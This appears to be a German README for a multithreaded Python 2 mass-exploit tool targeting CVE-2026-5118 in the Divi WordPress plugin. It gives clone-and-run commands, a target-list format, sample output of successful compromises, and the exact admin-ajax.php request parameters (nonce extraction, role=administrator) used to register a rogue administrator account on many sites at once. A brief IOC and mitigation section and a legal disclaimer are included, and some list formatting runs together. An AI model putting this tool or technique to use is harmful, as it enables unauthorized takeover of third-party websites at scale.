
CVE-2026-5118 – Python2-Massenexploit für das Divi WordPress-Plugin Nicht authentifizierte Administratorregistrierung über admin-ajax.php. Multithreaded-Scanner mit Nonce-Extraktion.
⚠️ WARNUNG: Dieses Tool ist nur für autorisierte Penetrationstests und Sicherheitsforschung bestimmt.
Unautorisierter Zugriff auf Computersysteme ist illegal. Verwenden Sie es nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Erlaubnis zum Testen haben. Weitere Haftungsausschlüsse finden Sie im Haftungsausschluss auf dem Deckblatt von Jenderal92. Sie können es HIER !!! überprüfen.
Dieses Python-2-Skript nutzt eine Privilegieneskalations-Schwachstelle im Divi WordPress Plugin (und verwandten Divi-Formularen) aus. Es ermöglicht die Fernregistrierung eines Administrator-Kontos, indem es:
fb_nonce aus dem Divi-Registrierungsformular des Ziels extrahiert./wp-admin/admin-ajax.php mit role=administrator sendet.https:// hinzu, falls fehlend.de_fb_obj).success, user_id, user created, etc.).results.txt im Format:https://target.com/wp-admin/ | username | passwordurllib2, Queue, threading – nicht kompatibel mit Python 3 ohne Änderungen)git clone https://github.com/Jenderal92/CVE-2026-5118.git
cd CVE-2026-5118
chmod +x CVE-2026-5118.py
Erstellen Sie eine Textdatei mit einer Domain oder URL pro Zeile. Sie können http:// / https:// weglassen – das Skript fügt standardmäßig https:// hinzu.
Example targets.txt:
example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
test-site.org
python CVE-2026-5118.py targets.txt
[*] Total targets : 4
[*] Credentials : Attacker / Attacker@123#+
[*] Threads : 20
[*] Output file : results.txt
[1] Checking https://example.com
[+] SUCCESS! https://example.com/wp-admin/
[2] Checking https://vulnerable-site.com
[+] SUCCESS! https://vulnerable-site.com/wp-admin/
[3] Checking http://192.168.1.100/wordpress
[3] FAILED http://192.168.1.100/wordpress
[4] Checking https://test-site.org
[4] FAILED https://test-site.org
=== DONE ===
Successful: 2 / 4
results.txt)https://example.com/wp-admin/|Attacker|Attacker@123#+
https://vulnerable-site.com/wp-admin/|Attacker|Attacker@123#+
Sie können die folgenden Variablen am Anfang des Skripts anpassen:
https:// hinzu, falls kein Schema angegeben ist.fb_nonce.multipart/form-data POST-Anfrage mit:
action=de_fb_ajax_submit_ajax_handlerfb_nonce=<extracted nonce>role=administratorde_fb_user_login / user_loginde_fb_user_pass / user_passde_fb_user_email / user_emailFür WordPress-Administratoren, die Divi verwenden:
admin-ajax.php-Anfragen zu überwachen.role-Parameter ein.Indikatoren für Kompromittierung (IOCs):
admin-ajax.php-Anfragen mit action=de_fb_ajax_submit_ajax_handlerAttacker)role=administrator in ZugriffsprotokollenDiese Software wird nur zu Bildungszwecken und für autorisierte Sicherheitstests bereitgestellt. Der Autor übernimmt keine Haftung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden. Durch die Nutzung dieser Software erklären Sie sich damit einverstanden:
Ein Verstoß gegen diese Bedingungen kann zu strafrechtlicher Verfolgung, Geld- oder Haftstrafen führen.
Pull-Requests für Verbesserungen sind willkommen (Python 3 Port, bessere Nonce-Extraktion, zusätzliche Erkennung von Registrierungspfaden). Bitte den ethischen Haftungsausschluss beibehalten.
| Variable | Default | Description |
|---|
DEFAULT_USERNAME | Attacker | Benutzername zum Registrieren |
DEFAULT_PASSWORD | Attacker@123#+ | Passwort (stark mit Sonderzeichen) |
DEFAULT_EMAIL | [email protected] | E-Mail-Adresse |
THREAD_COUNT | 20 | Anzahl gleichzeitiger Threads |
OUTPUT_FILE | results.txt | Datei zum Speichern erfolgreicher Ziele |